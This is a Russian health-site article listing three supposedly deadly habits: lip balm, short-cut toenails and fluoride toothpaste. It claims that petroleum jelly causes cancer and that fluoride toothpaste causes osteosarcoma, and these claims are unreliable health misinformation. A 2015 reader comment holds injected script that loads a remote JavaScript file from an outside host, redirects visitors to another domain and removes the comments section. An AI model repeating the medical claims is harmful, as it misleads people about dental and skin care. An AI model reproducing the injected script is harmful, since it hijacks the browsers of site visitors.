Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  3 привычки, которые могут...  >>  3 привычки, которые могут вас убить
 
Обратная связь
 

3 привычки, которые могут вас убить

Размер шрифта
23 ноября 2011 08:14
  • google_analytics: false
  • Нравится

Коротко остриженные ногти, гигиеническая помада, чистка зубов два раза в день. Казалось бы, самый правильный и «здоровый» список привычек. Однако не все так просто на самом деле.


 1. Гигиеническая помада в холодное время года

Когда в помещениях включают отопление, воздух становится очень сухим. Если в таких условиях нанести гигиеническую помаду, то вазелин в ее составе будет притягивать влагу не из воздуха (ее там нет), а из губ. Губы еще сильнее высыхают, а вы, пытаясь их увлажнить, снова и снова наносите гигиеническую помаду.

По данным одного научного исследования за 10 лет женщина «съедает» 3 кг технического вазелина, сделанного на основе нефтепродуктов. Ученые предполагают, что связь между вазелином и раком прямая. По данным другого исследования у женщин с раком груди уровень гидрокарбоната (вещества в техническом вазелине) вдвое выше, чем у женщин без рака.

Что делать?

  1. Установите увлажнитель воздуха. Влажность воздуха в помещении должна быть не меньше 60%!

  2. Покупайте гигиеническую помаду на основе пчелиного воска.

  3. Пейте 2 литра воды в день. Увлажнение должно идти изнутри, а не снаружи!

2. Коротко остриженные ногти на ногах

Если вы коротко стрижете ногти и считаете, что никакие неприятности вам не грозят, знайте: вы ошибаетесь. Неправильно остриженный ноготь может врасти в ногтевой валик.

Что делать, если под коротко остриженным ногтем началось воспаление?

  1. Распарьте ногу.

  2. Вставьте ватку под ноготь с помощью зубочистки.

  3. Оставьте ватку под ногтем на день: это приподнимет ноготь над очагом воспаления и позволит ему отрасти в нужном направлении.

  4. Заклейте пластырем кожу под ногтем.

  5. Не отрезайте уголок вросшего ногтя самостоятельно. Если все-таки болит, обратитесь к врачу!

3. Зубная паста со фтором

Если вы считаете, что зубная паста со фтором укрепляет зубную эмаль и защищает зубы от кариеса, вы правы лишь отчасти! Еще в 1972 году были проведены медицинские исследования, доказавшие, что фтор опасен для здоровья. Он накапливается в костях, провоцируя развитие раковой опухоли – остеосаркомы.

Что делать?

  1. Отказаться от чрезмерного использования зубной пасты со фтором и не чистить этой пастой зубы больше одного раза в день. Фтор накапливается в моче, тканях, крови.

  2. Чистить зубы обычной зубной пастой, а лучше зубным порошком.

Видеосюжеты по теме: 

Плохие хорошие привычки. Как себе не навредить

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:05

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.